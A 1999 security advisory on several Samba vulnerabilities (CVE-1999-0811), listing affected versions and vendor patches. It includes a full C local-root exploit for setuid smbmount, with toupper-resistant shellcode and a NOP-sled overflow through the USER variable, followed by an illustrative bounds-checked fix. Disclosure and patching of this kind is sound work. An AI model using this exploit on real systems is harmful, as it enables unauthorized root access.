Multiple remote vulnerabilities in the Linux Samba package
Published: 1999-07-21
Updated: 1999-07-21
Affected systems:
Samba Samba 2.0.4
- Debian Linux 2.1
- RedHat Linux 6.0
- RedHat Linux 5.2
- RedHat Linux 4.2
Unaffected systems:
Samba Samba 2.0.5
- Caldera eServer 2.3.1
- Caldera OpenLinux 2.3
Description:
BUGTRAQ ID: 536
CVE(CAN) ID: CVE-1999-0811
Samba is a program that provides NetBIOS services on Unix-like servers. With the Samba package, files can be shared conveniently between Unix and Windows.
Samba versions before 2.0.5 contain several security vulnerabilities. The first is a denial-of-service vulnerability in nmbd. The second is a buffer overflow in smbd; it is not exploitable in a default installation, but if the system administrator has set the "message command" option in smb.conf, an attacker may be able to use it to gain root privileges remotely. The third is a race condition: if the smbmnt program is installed setuid root, an attacker may be able to use it to mount any directory in the filesystem.
<*Source: Andrew Tridgell (tridge@samba.org)
Link: https://www.redhat.com/support/errata/RHSA-1999-022.html
*>
Testing method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Users act at their own risk!
/*
The default parameters to the program
often work, however I have found that the offset parameter sometimes
varies wildly, values between -600 and -100 usually work though, a quick
shell script will scan through these.
*/
/*
** smbexpl -- a smbmount root exploit under Linux
**
** Author: Gerald Britton <gbritton@nih.gov>
**
** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.
** The code does not do range checking when copying a username from
** the environment variables USER or LOGNAME. To get this far into
** the code we need to execute with dummy arguments of a server and a
** mountpoint to use (./a in this case). The user will need to create
** the ./a directory and then execute smbexpl to gain root. This code
** is also setup to use /tmp/sh as the shell as bash-2.01 appears to
** do a seteuid(getuid()) so /bin/sh on my system won't work. Finally
** a "-Q" (an invalid commandline argument) causes smbmount to fail when
** parsing args and terminate, thus jumping into our shellcode.
**
** The shellcode used in this program also needed to be specialized as
** smbmount toupper()'s the contents of the USER variable. Self modifying
** code was needed to ensure that the shellcode will survive toupper().
**
** The quick fix for the security problem:
** chmod -s /sbin/smbmount
**
** A better fix would be to patch smbmount to do bounds checking when
** copying the contents of the USER and LOGNAME variables.
**
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* strlen */
#include <unistd.h>   /* execl */
#define DEFAULT_OFFSET -202
#define DEFAULT_BUFFER_SIZE 211
#define DEFAULT_ALIGNMENT 2
#define NOP 0x90
/* This shell code is designed to survive being filtered by toupper() */
char shellcode[] =
"\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
"\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
"\xeb\x05\xe8\xdb\xff\xff\xff"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
/* Returns the current stack pointer. 32-bit x86 only: it relies on the
   return value being whatever was left in %eax, so there is no explicit
   return statement. */
unsigned long get_sp(void) {
    __asm__("movl %esp,%eax");
}
int main(int argc, char *argv[]) {
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    int alignment=DEFAULT_ALIGNMENT;
    int i;
    /* optional overrides: buffer size, offset from the stack pointer, alignment */
    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);
    if (argc > 3) alignment = atoi(argv[3]);
    printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);
    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }
    addr = get_sp() - offset;
    fprintf(stderr,"Using address: 0x%lx\n", addr);
    /* fill the buffer with the guessed return address ... */
    ptr = buff;
    addr_ptr = (long *) (ptr+alignment);
    for (i = 0; i < bsize-alignment; i+=4)
        *(addr_ptr++) = addr;
    /* ... overwrite the first half with a NOP sled ... */
    for (i = 0; i < bsize/2; i++)
        buff[i] = NOP;
    /* ... and place the shellcode so that it ends at offset 128 */
    ptr = buff + (128 - strlen(shellcode));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';
    /* the over-long value reaches smbmount through the USER environment variable */
    setenv("USER",buff,1);
    execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",(char *)0);
    return 1; /* only reached if execl() fails */
}
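The exploit header above recommends bounds checking when smbmount copies USER or LOGNAME. As an added illustration (not code from the advisory, from Samba, or from the exploit's author), the following checked copy refuses a value that would not fit in a fixed-size field instead of writing past it, and applies the same upper-casing the comment says smbmount performs. The field size, the function names, and the USER-then-LOGNAME order being passed in as parameters are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Assumed size of the fixed username field; the real smbmount buffer size
 * is not stated on the page, so this value is an illustration only. */
#define USERNAME_BUF 32

/* Bounds-checked copy of a username into a fixed-size field.
 * Returns 0 on success and -1 (leaving dst as an empty string) when src is
 * missing, empty, or would not fit together with the terminating NUL.
 * Refusing the value, rather than silently truncating it, means an
 * attacker-controlled environment variable can never write past dst.
 * Upper-casing mirrors the toupper() pass noted in the exploit comments. */
int copy_username_checked(char *dst, size_t dstlen, const char *src)
{
    size_t i, n;

    if (dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL || src[0] == '\0')
        return -1;
    /* measure src, but never scan further than we could possibly store */
    for (n = 0; n < dstlen && src[n] != '\0'; n++)
        ;
    if (n >= dstlen)               /* no room left for the NUL terminator */
        return -1;
    for (i = 0; i < n; i++)
        dst[i] = (char)toupper((unsigned char)src[i]);
    dst[n] = '\0';
    return 0;
}

/* Resolve the username in the order the exploit comments describe (USER
 * first, then LOGNAME), but through the checked copy. The two values are
 * passed in explicitly so the function can be exercised without touching
 * the process environment; a real caller would pass getenv("USER") and
 * getenv("LOGNAME"). Returns 0 on success, -1 if neither value is usable. */
int load_username(const char *user_env, const char *logname_env,
                  char *dst, size_t dstlen)
{
    if (copy_username_checked(dst, dstlen, user_env) == 0)
        return 0;
    return copy_username_checked(dst, dstlen, logname_env);
}
```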
Recommendations:
Vendor patches:
Debian
------
The vendor has released an upgrade that fixes this security problem; download it from the vendor's home page:
Source code:
http://security.debian.org/dists/stable/updates/source/samba_2.0.5a-1.diff.gz
MD5 checksum: 1354ea63f79e7fa0b4b71685dbac118b
http://security.debian.org/dists/stable/updates/source/samba_2.0.5a-1.dsc
MD5 checksum: e51aeb259913179b60dbddd0b9e70bf5
http://security.debian.org/dists/stable/updates/source/samba_2.0.5a.orig.tar.gz
MD5 checksum: 497e5f98ed9b520b18e926ff2f7307ba
RedHat
------
RedHat has released a security advisory (RHSA-1999:022-02) and corresponding patches for this:
RHSA-1999:022-02: New Samba packages for Red Hat Linux 4.2, 5.2, 6.0
Link: https://www.redhat.com/support/errata/RHSA-1999-022.html
Patch downloads:
Intel:
ftp://updates.redhat.com/6.0/i386/
samba-2.0.5a-1.i386.rpm
samba-client-2.0.5a-1.i386.rpm
Alpha:
ftp://updates.redhat.com/6.0/alpha/
samba-2.0.5a-1.alpha.rpm
samba-client-2.0.5a-1.alpha.rpm
SPARC:
ftp://updates.redhat.com/6.0/sparc/
samba-2.0.5a-1.sparc.rpm
samba-client-2.0.5a-1.sparc.rpm
The patches can be installed with the following command:
rpm -Fvh [filename]